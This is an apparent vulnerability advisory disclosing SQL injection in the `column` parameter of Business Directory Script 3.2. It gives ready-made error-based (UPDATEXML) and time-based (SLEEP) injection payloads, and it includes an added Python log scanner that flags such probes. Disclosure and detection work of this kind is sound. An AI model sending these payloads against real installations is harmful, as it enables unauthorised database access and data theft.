Business Directory Script 3.2 SQL Injection

## Title: Business-Directory-Script-3.2 SQLi
## Author: nu11secur1ty
## Date: 08/25/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/business-directory-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection


## Description:
The `column` parameter appears to be vulnerable to SQL injection attacks. The payload `'` was submitted in the `column` parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Additionally, the payload `(select*from(select(sleep(20)))a)` was submitted in the `column` parameter. The application took 20271 milliseconds to respond to the request, compared with 230 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The attacker can steal all information from the database of the server of this application!


STATUS: HIGH-CRITICAL Vulnerability


[+]Payload:
```mysql
---
Parameter: column (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(UPDATEXML(2242,CONCAT(0x2e,0x716a767a71,(SELECT(ELT(2242=2242,1))),0x7178787671),5199))&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(SELECT 6261 FROM (SELECT(SLEEP(15)))CMYC)&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=
---
```
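A defensive check for the behaviour described above, as an added example that is not part of the original advisory or the vendor's code: it flags logged requests whose `column` or `direction` value is not a plain identifier or `ASC`/`DESC`. The log format, the `/index.php` path, the client addresses and the `created` column name are constructed for illustration, and the identifier rule is an assumption about what a legitimate sort column looks like.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate sort column is a bare SQL identifier,
# optionally table-qualified (e.g. "t1.created").
IDENTIFIER = re.compile(r"[A-Za-z_]\w*(?:\.[A-Za-z_]\w*)?", re.ASCII)
DIRECTIONS = {"ASC", "DESC"}
# Client address and request target from a common/combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def check_sort_params(query_string):
    """Return [(param, decoded_value), ...] for sort parameters that are not
    a plain identifier / ASC|DESC. An empty list means nothing was flagged."""
    params = parse_qs(query_string, keep_blank_values=True)
    bad = [("column", v) for v in params.get("column", [])
           if not IDENTIFIER.fullmatch(v)]
    bad += [("direction", v) for v in params.get("direction", [])
            if v.upper() not in DIRECTIONS]
    return bad

def scan_access_log(lines):
    """Return [(line_no, client, findings), ...] for flagged requests."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        match = REQUEST.match(line)
        if not match:
            continue  # not a request line this parser understands
        client, target = match.groups()
        findings = check_sort_params(urlsplit(target).query)
        if findings:
            hits.append((line_no, client, findings))
    return hits

# Constructed sample log lines; the two flagged values are the probes
# quoted in the advisory's description.
BASE = "/index.php?controller=pjAdminListings&action=pjActionGetListing"
SAMPLE_LOG = [
    f'198.51.100.4 - - [25/Aug/2023:10:00:01 +0000] "GET {BASE}&column=created&direction=DESC HTTP/1.1" 200 912',
    f'203.0.113.9 - - [25/Aug/2023:10:02:13 +0000] "GET {BASE}&column=%27&direction=ASC HTTP/1.1" 200 301',
    f'203.0.113.9 - - [25/Aug/2023:10:02:40 +0000] "GET {BASE}&column=(select*from(select(sleep(20)))a)&direction=ASC HTTP/1.1" 200 912',
]

if __name__ == "__main__":
    for line_no, client, findings in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no} from {client}: {findings}")
```

The same identifier and direction rule can be enforced server-side before the value reaches a query, mapped to a fixed list of sortable columns.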


## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Business-Directory-Script-Version%3A3.2/SQLi)


## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/business-directory-script-version32-sqli.html)


## Time spent:
01:35:00




